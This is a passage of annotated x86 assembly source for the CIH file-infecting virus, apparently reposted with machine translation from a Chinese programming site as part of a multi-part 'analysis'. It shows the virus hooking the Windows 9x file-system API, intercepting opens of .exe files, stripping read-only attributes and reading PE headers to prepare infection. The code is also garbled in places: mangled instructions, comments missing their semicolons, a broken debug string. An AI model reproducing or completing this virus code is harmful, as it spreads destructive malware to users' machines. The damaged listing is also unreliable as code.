Virus program source code instance analysis-CIH virus [3] code, you need to refer to the jmp ExitRing0Init; exit Ring0 level
; Size of the merged code
CodeSizeOfMergeVirusCodeSection = offset $
; New IFSMgr_InstallFileSystemApiHook function call
InstallFileSystemApiHook:
Push ebx
Call @ 4
@ 4:
Pop ebx; get the offset address of the current command
Add ebx, FileSystemApiHook-@ 4; the offset difference is equal to the offset of FileSystemApiHook.
Push ebx
Int 20 h; call Vxd to remove the hook pointing to FileSystemApiHook
IFSMgr_RemoveFileSystemApiHook = $
Dd 00400068 h; use the eax, ecx, edx, and flags registers
Pop eax
; Call the IFSMgr_InstallFileSystemApiHook function to connect to the FileSystemApiHook hook
Push dword ptr [esp + 8]
Call OldInstallFileSystemApiHook-@ 3 [ebx]
Pop ecx
Push eax
Push ebx
Call OldInstallFileSystemApiHook-@ 3 [ebx]
Pop ecx
Mov dr0, eax; adjust the OldFileSystemApiHook address
Pop eax
Pop ebx
Ret
OldInstallFileSystemApiHook dd; original InstallFileSystemApiHook call address
; IFSMgr_FileSystemHook call entry
FileSystemApiHook:
@ 3 = FileSystemApiHook
Push ad; save register
Call @ 5
@ 5:
Pop esi; mov esi, offset; esi is the offset of the current command
Add esi, VirusGameDataStartAddress-@ 5; esi is the offset of FileSystemApiHook
The offset difference of VirusGameDataStartAddress is equal to the offset of VirusGameDataStartAddress.
; Test the "busy" sign, and "busy" is switched to pIFSFunc
Test byte ptr (OnBusy-@ 6) [esi], 01 h
Jnz pIFSFunc
If the file is not opened, go to prevhook
Lea ebx, [esp + 20 h + 04 h + 04 h]; ebx is the address of FunctionNum
The file system Hook is called in the following format:
; FileSystemApiHookFunction (pIFSFunc FSDFnAddr, int FunctionNum, int Drive,
; Int ResourceFlags, int CodePage, pioreq pir)
Determine whether the call is to open the file. if not, skip to the previous file hook.
Cmp dword ptr [ebx], 00000024 h
Jne prevhook
Inc byte ptr (OnBusy-@ 6) [esi]; Enable OnBusy; set "busy" to "busy"
Get the drive letter specified by the file path, and put the drive name in FileNameBuffer
If the drive letter is 03 h, it indicates that the disk is a drive C.
Mov esi, offset FileNameBuffer
Add esi, FileNameBuffer-@ 6; esi points to FileNameBuffer
Push esi; save
Mov al, [ebx + 04 h]; the address where ebx + 4 is the disk number
; Whether it is a UNC (universal naming conventions) address. If yes, it is transferred to CallUniToBCSPath.
Cmp al, 0ffh
Je CallUniToBCSPath
Add al, 40 h
Mov ah ,':'
Mov [esi], eax; in the form of "X:", that is, add a colon after the drive letter
Inc esi
Inc esi
Converts Canonicalized Unicode characters to common BCS character sets.
; UniToBCSPath (unsigned char * pBCSPath, ParsedPath * pUniPath,
; Unsigned int maxLength, int charSet)
CallUniToBCSPath:
Push 00000000 h; character set
Push FileNameBufferSize; character length
Mov ebx, [ebx + 10 h]
Mov eax, [ebx + 0ch]
Add eax, 04 h
Push eax; the first address of the Uni character
Push esi; BCS initial address
Int 20 h; call UniToBCSPath
UniToBCSPath = $
Dd 00400041 h call id
Add esp, 04 h * 04 h
Determine whether the file is an EXE file
Cmp [esi + eax-04h], 'exe .'
Pop esi
Jne DisableOnBusy
IF DEBUG
The following information is used for debugging:
Cmp [esi + eax-06h], 'kcuf'
Jne DisableOnBusy
ENDIF
Determine whether the file exists. if not, switch to DisableOnBusy.
Cmp word ptr [ebx + 18 h], 01 h
Jne DisableOnBusy
; Get file attributes
Mov ax, 4300 h
Int 20 h; call IFSMgr_Ring0_FileIO to obtain file attributes
IFSMgr_Ring0_FileIO = $
Dd 00400032 h; call number
Jc DisableOnBusy
Push ecx
; Get the IFSMgr_Ring0_FileIO address
Mov edi, dword ptr (IFSMgr_Ring0_FileIO-@ 7) [esi]
Mov edi, [edi]
; Determine whether the file is read-only. If yes, modify the file attribute; otherwise, switch to OpenFile.
Test cl, 01 h
Jz OpenFile
Mov ax, 4301 h
Xor ecx, ecx
Call edi; call the IFSMgr_Ring0_FileIO function to modify File attributes so that files can be written
; Open the file
OpenFile:
Xor eax, eax
Mov ah, 0d5h
Xor ecx, ecx; file attributes
Xor edx, edx
Inc edx
Mov ebx, edx
Inc ebx; esi is the first address of the file name
Call edi; call IFSMgr_Ring0_FileIO to open a file
Xchg ebx and eax; save the file handle in ebx
; Whether to restore the file attributes (there is no need to restore the write attributes)
Pop ecx
Pushf
Test cl, 01 h
Jz IsOpenFileOK
; Restore file attributes
Mov ax, 4301 h
Call edi; restore file attributes
; Whether the file is opened successfully. if the file fails to be opened, it is directed to DisableOnBusy.
IsOpenFileOK:
Popf
Jc DisableOnBusy
; File opened successfully
Push esi; add the first address of the file name data area to the stack
Pushf; CF = 0, save the flag
Add esi, DataBuffer-@ 7; esi points to the first address of the data zone
; Get the offset of the new file header
Xor eax, eax
Mov ah, 0d6h; read file function Number of IFSMgr_Ring0_FileIO (R0_READFILE)
To minimize the length of virus code, save eax to ebp.
Mov ebp, eax
Push 00000004 h; read 4 bytes
Pop ecx
Push 0000003ch; read the Windows file header offset at the DOS file header offset of 3ch
Pop edx
Call edi; read files to esi
Mov edx, [esi]; offset of Windows file header to edx
; Obtain the PE mark and infected mark of the graphic file header
Dec edx
Mov eax, ebp; function number
Call edi; read files to esi
Determine whether it is PE. If yes, further determine whether it has been infected
; Determine whether it is a WinZip Self-decompressed file. If yes, Self-Extractor * will not be infected *
Cmp dword ptr [esi], 00455000 h; identify whether it is a PE file (Mark "PE/0/0 ")
Jne CloseFile; close the file if not
If the file is a PE file and is not infected, the file begins to be infected.
Push ebx; save the file handle
Push 00 h
; Set the virus infection mark
Push 01 h; tag size
Push edx; edx point to PE file header offset 00 h
Push edi; the address where edi is IFSMgr_Ring0_FileIO
Mov dr1, esp; save esp
; Set the NewAddressOfEntryPoint entry
Push eax
; Read file header
Mov eax, ebp
Mov cl, SizeOfImageHeaderToRead; read 2 bytes
Add edx, 07 h; PE file header + 07h is NumberOfSections (number of blocks)
Call edi; read NumberOfSections (number of blocks) to esi
Lea eax, (AddressOfEntryPoint-@ 8) [edx]
Push eax; file pointer
Lea eax, (NewAddressOfEntryPoint-@ 8) [esi]
Push eax; buffer address
Put the edx value at the beginning of the table of the virus code block in the file.
Movzx eax, word ptr (SizeOfOptionalHeader-@ 8) [esi]
Lea edx, [eax + edx + 12 h]; edx is the offset of the virus code block table.
Obtain the table size of the virus code block.
Mov al, SizeOfScetionTable; size of each block table item
Mov cl, (NumberOfSections-@ 8) [esi]
Mul cl; multiply each block table item by the number of blocks to be equal to the block table size
; Set the virus code block table
Lea esi, (StartOfSectionTable-@ 8) [esi]; esi points to the first address of the block table (in the virus dynamic data area)
The above is the analysis of the virus program source code instance-CIH virus [3] content. For more information, please follow the PHP Chinese network (www.php1.cn )!
